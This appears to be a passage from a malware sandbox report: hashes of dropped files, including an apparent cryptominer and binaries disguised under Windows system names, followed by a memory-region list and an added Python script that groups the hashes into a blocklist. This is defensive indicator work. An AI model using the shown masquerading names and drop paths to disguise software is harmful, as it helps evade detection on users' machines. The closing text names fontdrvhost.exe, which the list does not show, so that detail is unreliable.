C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fonthostSvcIntodhcp.exe.log
  MD5: c3768cc379bdfb7850f881c26e417929
  SHA1: b356b73dd3c102bbfa2e30280478a70ab7ebaf95
  SHA256: 6249d345cf089d21710e680a923fca94324d1523c8dd8e6d4947e3fa064c353a
  SHA512: e115130acc07da8838de670e2bbe491e4a4a26ff968f67a46fd5ada86e453234f5a4a4a0c1574cb194dc0274fd266cf5507036208a0dc5358e7454d01b88fdd4

C:\Users\Admin\AppData\Roaming\Dcr.exe
  MD5: 975a0ad02701f9f528784dee5a9728d2
  SHA1: 8a3b57da095dd6fc9d61fe004c1025d929370515
  SHA256: b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b
  SHA512: 6d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  MD5: 89c453dbd36f561195de8e5c5dce77a0
  SHA1: 8cc44dd7646ec89b6c22214614a8cab158e47f0c
  SHA256: ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d
  SHA512: c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
  MD5: 7059ba6625325156b764224d2b2dbd83
  SHA1: 4cc34def0b7d39b913559f539e6d58a3e363f2e3
  SHA256: 04c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608
  SHA512: ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506

C:\Users\Admin\AppData\Roaming\etc.exe
  MD5: b07420edcab9bae1bb3fe4befc7ee57c
  SHA1: 41ae0d56b863d8155865548e8231e1994e197c21
  SHA256: 2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
  SHA512: 584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

C:\Users\Admin\AppData\Roaming\services32.exe
  MD5: b07420edcab9bae1bb3fe4befc7ee57c
  SHA1: 41ae0d56b863d8155865548e8231e1994e197c21
  SHA256: 2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
  SHA512: 584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

C:\Users\Admin\AppData\Roaming\services64.exe
  MD5: f99c879d74bf1355905734a411191276
  SHA1: 103a41ade035585e4834f7b939e15608fb64d201
  SHA256: eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe
  SHA512: e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

C:\Users\Admin\AppData\Roaming\xmr.exe
  MD5: f99c879d74bf1355905734a411191276
  SHA1: 103a41ade035585e4834f7b939e15608fb64d201
  SHA256: eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe
  SHA512: e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe
  MD5: 8cf49d252229ed14a26b9a2b45771e1d
  SHA1: d53682e13e1f6a1a619c0d1780d86479d388bf0c
  SHA256: 45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f
  SHA512: 808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

C:\fonthostSvc\5R3FFGftzpp.vbe
  MD5: cb60c41590dc32740e8923ba0cb6df97
  SHA1: aabc007b611df20e79fceee539ef63e7f2754304
  SHA256: c48aa50f0879775b7f0d878898cc662b8ea0412f401fb6c17be945ffd63cfda2
  SHA512: a42de214aef793c75cf1928c0734b65bd1817c4b36aae663c9119539ab8bec6b7e1881d8ad971a2fc4e8afe09958bc395928ce5e3eb393cb5b755e14e71264da

C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat
  MD5: 7245c594f9448bae4a79764fb6897e25
  SHA1: 1eb300765111494f6c7049b5abbbb0e5725b39aa
  SHA256: 4fa6f4b4721eadae3ce004cefa98cfd8503e5f8dc0cc553d4db012a84c9eefa5
  SHA512: 26c00c8a5e2cee0f8779cb9b9cec7efc1712c82c8db8fb0d3d3a7e997a8ccf1ebc0fef8b35cb129a111bdb3c224c111c77b347d50252bb601293a73dc30445c8

C:\fonthostSvc\fonthostSvcIntodhcp.exe
  MD5: 8cf49d252229ed14a26b9a2b45771e1d
  SHA1: d53682e13e1f6a1a619c0d1780d86479d388bf0c
  SHA256: 45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f
  SHA512: 808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a
-
memory/8-144-0x0000000000000000-mapping.dmp
memory/60-141-0x0000000000000000-mapping.dmp
memory/64-216-0x0000000000000000-mapping.dmp
memory/740-165-0x0000000000000000-mapping.dmp
memory/768-139-0x0000000000000000-mapping.dmp
memory/964-224-0x0000000001080000-0x00000000010A0000-memory.dmp  Filesize: 128KB
memory/964-222-0x0000000140000000-0x0000000140758000-memory.dmp  Filesize: 7.3MB
memory/964-223-0x00000001402EB66C-mapping.dmp
memory/964-227-0x0000000140000000-0x0000000140758000-memory.dmp  Filesize: 7.3MB
memory/964-228-0x00000000010B0000-0x00000000010D0000-memory.dmp  Filesize: 128KB
memory/964-229-0x00000000010E0000-0x0000000001100000-memory.dmp  Filesize: 128KB
memory/1052-157-0x0000000000000000-mapping.dmp
memory/1524-212-0x0000000000D20000-0x0000000000D21000-memory.dmp  Filesize: 4KB
memory/1524-207-0x0000000000000000-mapping.dmp
memory/1524-221-0x00000000033C0000-0x00000000033C2000-memory.dmp  Filesize: 8KB
memory/1524-132-0x0000000000000000-mapping.dmp
memory/1540-187-0x0000000000000000-mapping.dmp
memory/1968-168-0x0000000000000000-mapping.dmp
memory/2084-143-0x0000000000000000-mapping.dmp
memory/2204-167-0x0000000000000000-mapping.dmp
memory/2208-138-0x000000001BAA0000-0x000000001BAA2000-memory.dmp  Filesize: 8KB
memory/2208-136-0x0000000000C20000-0x0000000000C21000-memory.dmp  Filesize: 4KB
memory/2208-133-0x0000000000000000-mapping.dmp
memory/2288-204-0x0000000000000000-mapping.dmp
memory/2288-156-0x0000000000000000-mapping.dmp
memory/2392-184-0x0000000000000000-mapping.dmp
memory/2412-174-0x0000000001700000-0x0000000001702000-memory.dmp  Filesize: 8KB
memory/2412-169-0x0000000000000000-mapping.dmp
memory/2412-176-0x00000000016E0000-0x00000000016E2000-memory.dmp  Filesize: 8KB
memory/2412-177-0x0000000001710000-0x0000000001712000-memory.dmp  Filesize: 8KB
memory/2412-178-0x000000001D000000-0x000000001D001000-memory.dmp  Filesize: 4KB
memory/2412-179-0x000000001E5B0000-0x000000001E5B1000-memory.dmp  Filesize: 4KB
memory/2412-175-0x0000000003160000-0x0000000003165000-memory.dmp  Filesize: 20KB
memory/2412-153-0x0000000000000000-mapping.dmp
memory/2420-185-0x0000000000000000-mapping.dmp
memory/2428-152-0x0000000000000000-mapping.dmp
memory/2660-164-0x0000000000000000-mapping.dmp
memory/2740-166-0x0000000000000000-mapping.dmp
memory/2740-142-0x0000000000000000-mapping.dmp
memory/2836-213-0x0000000000AC0000-0x0000000000AC1000-memory.dmp  Filesize: 4KB
memory/2836-206-0x0000000000000000-mapping.dmp
memory/2836-220-0x00000000018B0000-0x00000000018B2000-memory.dmp  Filesize: 8KB
memory/2844-181-0x0000000001230000-0x0000000001239000-memory.dmp  Filesize: 36KB
memory/2844-189-0x000000001C790000-0x000000001C792000-memory.dmp  Filesize: 8KB
memory/2844-118-0x0000000000000000-mapping.dmp
memory/2844-183-0x0000000001260000-0x0000000001261000-memory.dmp  Filesize: 4KB
memory/2844-126-0x00000000004A0000-0x00000000004A1000-memory.dmp  Filesize: 4KB
memory/2888-154-0x0000000000000000-mapping.dmp
memory/2888-190-0x0000000000000000-mapping.dmp
memory/2888-219-0x000000001CC20000-0x000000001CC22000-memory.dmp  Filesize: 8KB
memory/3064-114-0x0000000000000000-mapping.dmp
memory/3204-186-0x0000000000000000-mapping.dmp
memory/3204-205-0x0000000000000000-mapping.dmp
memory/3204-155-0x0000000000000000-mapping.dmp
memory/3304-151-0x0000000000000000-mapping.dmp
memory/3588-188-0x000000001CC40000-0x000000001CC42000-memory.dmp  Filesize: 8KB
memory/3588-115-0x0000000000000000-mapping.dmp
memory/3588-122-0x00000000006B0000-0x00000000006B1000-memory.dmp  Filesize: 4KB
memory/3588-180-0x0000000000EB0000-0x0000000000EB6000-memory.dmp  Filesize: 24KB
memory/3960-218-0x000000001D2B0000-0x000000001D2B2000-memory.dmp  Filesize: 8KB
memory/3960-191-0x0000000000000000-mapping.dmp
memory/3960-158-0x0000000000000000-mapping.dmp
memory/3960-162-0x000000001B370000-0x000000001B372000-memory.dmp  Filesize: 8KB
memory/3964-129-0x0000000000000000-mapping.dmp
memory/3984-140-0x0000000000000000-mapping.dmp
memory/4012-163-0x0000000000000000-mapping.dmp
memory/4044-150-0x000000001B870000-0x000000001B872000-memory.dmp  Filesize: 8KB
memory/4044-145-0x0000000000000000-mapping.dmp
memory/4044-217-0x0000000000000000-mapping.dmp
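The Downloads list repeats several digests under different names: fonthostSvcIntodhcp.exe and the fake ShellExperienceHost.exe are the same file (SHA256 45d61f97...), etc.exe is the same file as services32.exe (2ce38152...), and xmr.exe is the same file as services64.exe (eb6f4a94...). Grouping the rows by hash makes that visible and yields a deduplicated hash list for blocking. The Python below is an added example written for this page, not part of the sandbox report; the DROPPED table is transcribed from the Downloads section above, and lookup() is there to compare a file from a live host against the report without trusting its filename.

```python
import hashlib
from collections import defaultdict

# (path, SHA256) rows transcribed from this report's Downloads section.
DROPPED = [
    (r"C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fonthostSvcIntodhcp.exe.log",
     "6249d345cf089d21710e680a923fca94324d1523c8dd8e6d4947e3fa064c353a"),
    (r"C:\Users\Admin\AppData\Roaming\Dcr.exe",
     "b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b"),
    (r"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe",
     "ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d"),
    (r"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe",
     "04c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608"),
    (r"C:\Users\Admin\AppData\Roaming\etc.exe",
     "2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639"),
    (r"C:\Users\Admin\AppData\Roaming\services32.exe",
     "2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639"),
    (r"C:\Users\Admin\AppData\Roaming\services64.exe",
     "eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe"),
    (r"C:\Users\Admin\AppData\Roaming\xmr.exe",
     "eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe"),
    (r"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe",
     "45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f"),
    (r"C:\fonthostSvc\fonthostSvcIntodhcp.exe",
     "45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f"),
    (r"C:\fonthostSvc\fonthostSvcIntodhcp.exe",   # the report lists this path several times
     "45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f"),
    (r"C:\fonthostSvc\5R3FFGftzpp.vbe",
     "c48aa50f0879775b7f0d878898cc662b8ea0412f401fb6c17be945ffd63cfda2"),
    (r"C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat",
     "4fa6f4b4721eadae3ce004cefa98cfd8503e5f8dc0cc553d4db012a84c9eefa5"),
]


def group_by_sha256(entries):
    """Map each SHA256 to the sorted list of distinct paths the report gives for it."""
    groups = defaultdict(set)
    for path, sha in entries:
        groups[sha.lower()].add(path)
    return {sha: sorted(paths) for sha, paths in groups.items()}


def copies(entries):
    """Digests seen at more than one distinct path: one payload dropped under several names."""
    return {sha: paths for sha, paths in group_by_sha256(entries).items() if len(paths) > 1}


def unique_iocs(entries):
    """Deduplicated, sorted SHA256 list for a blocklist or a hash-match rule."""
    return sorted(group_by_sha256(entries))


def digests(data):
    """MD5/SHA1/SHA256/SHA512 of a byte string, the four columns the report prints per file."""
    return {name: hashlib.new(name, data).hexdigest() for name in ("md5", "sha1", "sha256", "sha512")}


def lookup(entries, data):
    """Report paths whose SHA256 matches the given file bytes; [] if the file is not in the report."""
    return group_by_sha256(entries).get(digests(data)["sha256"], [])


if __name__ == "__main__":
    for sha, paths in copies(DROPPED).items():
        print(sha[:16], "->", " | ".join(paths))
    print(len(unique_iocs(DROPPED)), "unique SHA256 values")
```

Matching on SHA256 rather than on filename is the point: the names on this page (services32.exe, sihost64.exe, ShellExperienceHost.exe, fontdrvhost.exe) are chosen to blend in, and a live host may carry the same payload under yet another of them.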